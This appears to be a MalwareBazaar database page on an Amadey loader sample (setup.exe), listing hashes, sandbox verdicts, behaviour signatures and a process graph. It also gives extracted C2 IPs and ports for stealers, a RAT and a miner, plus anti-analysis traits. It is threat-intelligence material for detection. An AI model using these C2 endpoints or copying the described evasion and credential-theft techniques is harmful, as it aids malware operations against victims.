MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Amadey


Vendor detections: 17


Intelligence 17 IOCs YARA 8 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d
SHA3-384 hash: 504cf6575eaac6a2cfec50cb208924d2caacb575b7ddf6f4811816de7bd3a1e0311b1b020fa43c7667eb9bd6056f5e5b
SHA1 hash: f6ec97cac5dd7fd597abc69befee89262b1d0ec1
MD5 hash: 0b3d97b11e440029d52b34ae6798cfbc
humanhash: potato-cola-winter-white
File name:setup.exe
Download: download sample
Signature Amadey
Create hunting rule
File size:1'896'960 bytes
First seen:2024-06-21 22:29:16 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 2eabe9054cad5152567f0699947a2c5b (2'852 x LummaStealer, 1'312 x Stealc, 1'026 x Healer)
ssdeep 49152:TEfZfgzCiQwmi93LJuL18dSTvE7VinUNCeqOEK5BW6a4+:Tm2Qo7JuLASTcCoCXK5BW6at
TLSH T1FF95331E4F096CE7D60B70324CD169E49A686B6B5DE3CC47624E31B06CF324AEDBC658
TrID 29.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
22.7% (.EXE) Win16 NE executable (generic) (5038/12/1)
20.3% (.EXE) Win32 Executable (generic) (4504/4/1)
9.1% (.EXE) OS/2 Executable (generic) (2029/13)
9.0% (.EXE) Generic Win/DOS Executable (2002/3)
Reporter Chainskilabs
Tags:Amadey exe

Intelligence

File Origin
# of uploads :
1
# of downloads :
306
Origin country :
RO RO
Vendor Threat Intelligence
Malware family:
amadey
Create hunting rule
ID:
1
File name:
5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d.exe
Verdict:
Malicious activity
Analysis date:
2024-06-21 22:31:36 UTC
Tags:
amadey botnet stealer loader redline meta metastealer themida lumma netreactor evasion exela python remote xworm opendir rat asyncrat miner discord exfiltration lefthook
Link:
https://app.any.run/tasks/912a9b2e-dfd9-4a0a-85dd-19993e125392

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection(s):
SecuriteInfo.com.Win32.TrojanX-gen.13517.27633.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
81.4%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6675feed50b6d35655cbe1c7win7simulatehigh_evasion
Tags:
Banker Stealth Crypt Dexter
Result
Verdict:
Malware
Maliciousness:

Behaviour
Сreating synchronization primitives
Searching for analyzing tools
Searching for the window
Creating a file
Creating a window
Searching for synchronization primitives
Creating a file in the %temp% subdirectories
Creating a process from a recently created file
Creating a process with a hidden window
Connection attempt to an infection source
Enabling autorun by creating a file
Sending an HTTP POST request to an infection source
Verdict:
Malicious
Labled as:
Trojan.Generic
Link:
https://www.hybrid-analysis.com/sample/5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Verdict:
Suspicious
Link:
https://analyze.intezer.com/analyses/2b213c95-68e2-43e1-a08c-dfef9acb3221
Result
Threat name:
LummaC, Python Stealer, Amadey, LummaC S
Create hunting rule
Detection:
malicious
Classification:
troj.spyw.evad.mine
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1460973
Signature
AI detected suspicious sample
Allocates memory in foreign processes
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to inject code into remote processes
Detected generic credential text file
Detected Stratum mining protocol
Detected unpacking (changes PE section rights)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs new ROOT certificates
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Powershell downloading file from url shortener site
Sigma detected: Silenttrinity Stager Msbuild Activity
Snort IDS alert for network traffic
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Yara detected LummaC Stealer
Yara detected Monster Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Yara detected XWorm
Yara detected zgRAT
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1460973 Sample: setup.exe Startdate: 22/06/2024 Architecture: WINDOWS Score: 100 124 willingyhollowsk.shop 2->124 126 pool.supportxmr.com 2->126 128 15 other IPs or domains 2->128 156 Snort IDS alert for network traffic 2->156 158 Found malware configuration 2->158 160 Malicious sample detected (through community Yara rule) 2->160 162 28 other signatures 2->162 13 setup.exe 5 2->13         started        17 axplong.exe 2->17         started        19 Hkbsse.exe 2->19         started        21 2 other processes 2->21 signatures3 process4 file5 120 C:\Users\user\AppData\Local\...\axplong.exe, PE32 13->120 dropped 122 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 13->122 dropped 232 Detected unpacking (changes PE section rights) 13->232 234 Tries to evade debugger and weak emulator (self modifying code) 13->234 236 Tries to detect virtualization through RDTSC time measurements 13->236 23 axplong.exe 46 13->23         started        238 Hides threads from debuggers 17->238 240 Tries to detect sandboxes / dynamic malware analysis system (registry check) 17->240 242 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->242 signatures6 process7 dnsIp8 132 185.172.128.116 NADYMSS-ASRU Russian Federation 23->132 134 77.91.77.81, 49705, 49706, 49708 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 23->134 136 3 other IPs or domains 23->136 82 C:\Users\user\AppData\Local\...\0x3fg.exe, PE32 23->82 dropped 84 C:\Users\user\AppData\Local\Temp\...\legs.exe, PE32 23->84 dropped 86 C:\Users\user\AppData\Local\...\Installer.exe, PE32+ 23->86 dropped 88 19 other malicious files 23->88 dropped 164 Multi AV Scanner detection for dropped file 23->164 166 Detected unpacking (changes PE section rights) 23->166 168 Tries to detect sandboxes and other dynamic analysis tools (window names) 23->168 170 5 other signatures 23->170 28 monster.exe 23->28         started        32 upd.exe 23->32         started        34 deep.exe 23->34         started        36 8 other processes 23->36 file9 signatures10 process11 dnsIp12 106 C:\Users\user\AppData\...\_quoting_c.pyd, PE32+ 28->106 dropped 108 C:\Users\user\AppData\...\vcruntime140.dll, PE32+ 28->108 dropped 110 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 28->110 dropped 118 32 other files (31 malicious) 28->118 dropped 210 Multi AV Scanner detection for dropped file 28->210 212 Machine Learning detection for dropped file 28->212 214 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 28->214 39 stub.exe 28->39         started        216 Found many strings related to Crypto-Wallets (likely being stolen) 32->216 218 Contains functionality to inject code into remote processes 32->218 220 Writes to foreign memory regions 32->220 228 2 other signatures 32->228 44 RegAsm.exe 4 32->44         started        112 C:\Users\user\AppData\...\da_protected.exe, PE32 34->112 dropped 46 da_protected.exe 34->46         started        130 185.215.113.67, 40960, 49707 WHOLESALECONNECTIONSNL Portugal 36->130 114 C:\Users\user\AppData\Local\...\Hkbsse.exe, PE32 36->114 dropped 116 C:\Users\user\AppData\Local\...\Hkbsse.exe, PE32 36->116 dropped 222 Antivirus detection for dropped file 36->222 224 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 36->224 226 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 36->226 230 2 other signatures 36->230 48 MSBuild.exe 36->48         started        50 cmd.exe 36->50         started        52 RegAsm.exe 36->52         started        54 9 other processes 36->54 file13 signatures14 process15 dnsIp16 138 ip-api.com 208.95.112.1 TUT-ASUS United States 39->138 140 restores.name 65.0.21.192 AMAZON-02US United States 39->140 142 127.0.0.1 unknown unknown 39->142 90 C:\Users\user\AppData\Local\...\Monster.exe, PE32+ 39->90 dropped 92 C:\Users\user\AppData\...\system_info.txt, Algol 39->92 dropped 94 C:\Users\user\AppData\...\process_info.txt, ASCII 39->94 dropped 104 3 other malicious files 39->104 dropped 172 Multi AV Scanner detection for dropped file 39->172 174 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 39->174 192 2 other signatures 39->192 56 Conhost.exe 39->56         started        96 C:\Users\user\AppData\Roaming\...\svhoost.exe, PE32 44->96 dropped 98 C:\Users\user\AppData\Roaming\...\One.exe, PE32 44->98 dropped 176 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 44->176 178 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 44->178 58 svhoost.exe 44->58         started        62 One.exe 44->62         started        144 195.2.71.70 VDSINA-ASRU Russian Federation 46->144 100 C:\Users\user\AppData\Local\Temp\qnesar.exe, PE32 46->100 dropped 102 C:\Users\user\AppData\Local\Temp\pemvnq.exe, PE32+ 46->102 dropped 180 Detected unpacking (changes PE section rights) 46->180 182 Query firmware table information (likely to detect VMs) 46->182 184 Tries to detect sandboxes and other dynamic analysis tools (window names) 46->184 194 3 other signatures 46->194 146 willingyhollowsk.shop 104.21.91.177 CLOUDFLARENETUS United States 48->146 186 Found many strings related to Crypto-Wallets (likely being stolen) 48->186 196 2 other signatures 48->196 188 Suspicious powershell command line found 50->188 190 Uses schtasks.exe or at.exe to add and modify task schedules 50->190 64 powershell.exe 50->64         started        66 conhost.exe 50->66         started        68 schtasks.exe 50->68         started        70 schtasks.exe 50->70         started        148 4.185.27.237 LEVEL3US United States 52->148 72 conhost.exe 54->72         started        74 Conhost.exe 54->74         started        file17 signatures18 process19 dnsIp20 150 185.172.128.33, 49709, 8970 NADYMSS-ASRU Russian Federation 58->150 198 Multi AV Scanner detection for dropped file 58->198 200 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 58->200 202 Installs new ROOT certificates 58->202 208 3 other signatures 58->208 204 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 62->204 206 Reads the System eventlog 62->206 76 conhost.exe 62->76         started        152 bit.ly 67.199.248.11 GOOGLE-PRIVATE-CLOUDUS United States 64->152 154 pixel.com 54.67.42.145 AMAZON-02US United States 64->154 signatures21 process22 process23 78 Conhost.exe 76->78         started        process24 80 Conhost.exe 78->80         started       
Score:
100%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d
Detection:
smokeloader
Create hunting rule
Link:
https://mwdb.cert.pl/sample/5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d/
Threat name:
Win32.Trojan.Generic
Create hunting rule
Status:
Malicious
First seen:
2024-06-21 22:09:21 UTC
File Type:
PE (Exe)
Extracted files:
1
AV detection:
20 of 24 (83.33%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=lmrfenoqehql3edvu6pnp3vkm7r2gyf2txtmjuw3h3rdajvcniwq._file
Verdict:
malicious
Result
Malware family:
redline
Create hunting rule
Score:
  10/10
Tags:
family:amadey family:asyncrat family:monster family:redline botnet:06-20-24 botnet:default botnet:e76b71 botnet:newbild discovery evasion execution infostealer persistence rat spyware stealer themida trojan
Link:
https://tria.ge/reports/240621-2es2qsshjh/
Behaviour
Checks SCSI registry key(s)
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Program crash
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks installed software on the system
Checks whether UAC is enabled
Power Settings
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Identifies Wine through registry keys
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Amadey
AsyncRat
Detects Monster Stealer.
Monster
RedLine
RedLine payload
Malware Config
C2 Extraction:
http://77.91.77.81
185.215.113.67:40960
95.142.46.3:4449
95.142.46.3:7000
91.92.255.143:45786
Verdict:
Malicious
Tags:
n/a
YARA:
n/a
Link:
https://app.threat.zone/submission/dcb3dc55-fa5b-4d7b-88b5-4c1fa48113ae
Unpacked files
SH256 hash:
51a4326e185f9bd9251a0cc4e0ae3a5c84e695562b77188f241350c9fccfddc2
MD5 hash:
0d9a19f4cd23753769c2f54e97cb4419
SHA1 hash:
be95b16c41e2a9697398a98940bf57bd8dccb798
Detections:
win_amadey
Create hunting rule
Link:
https://www.unpac.me/results/88e36036-048e-46df-a2a8-5dabf6cb7945/
SH256 hash:
5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d
MD5 hash:
0b3d97b11e440029d52b34ae6798cfbc
SHA1 hash:
f6ec97cac5dd7fd597abc69befee89262b1d0ec1
Link:
https://www.unpac.me/results/88e36036-048e-46df-a2a8-5dabf6cb7945/
Verdict:
Malicious
Link:
https://www.vmray.com/analyses/_mb/5b225235d021/report/overview.html
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Amadey
Create hunting rule
Author:kevoreilly
Description:Amadey Payload
Rule name:maldoc_find_kernel32_base_method_1
Create hunting rule
Author:Didier Stevens (https://DidierStevens.com)
Rule name:maldoc_getEIP_method_1
Create hunting rule
Author:Didier Stevens (https://DidierStevens.com)
Rule name:MD5_Constants
Create hunting rule
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:meth_get_eip
Create hunting rule
Author:Willi Ballenthin
Rule name:vmdetect
Create hunting rule
Author:nex
Description:Possibly employs anti-virtualization techniques
Rule name:Windows_Generic_Threat_bd24be68
Create hunting rule
Author:Elastic Security
Rule name:win_amadey_a9f4
Create hunting rule
Author:Johannes Bader
Description:matches unpacked Amadey samples

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Amadey

Executable exe 5b225235d021e0bd9075a79ed7eeaa67e3a360ba9de6c4d2db3ee23026a26a2d

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/2874927/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/2888729/
  
URLhaus
https://urlhaus.abuse.ch/url/2888751/

BLint

The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_DLL_CHARACTERISTICSMissing dll Security Characteristics (HIGH_ENTROPY_VA)high
CHECK_NXMissing Non-Executable Memory Protectioncritical

Comments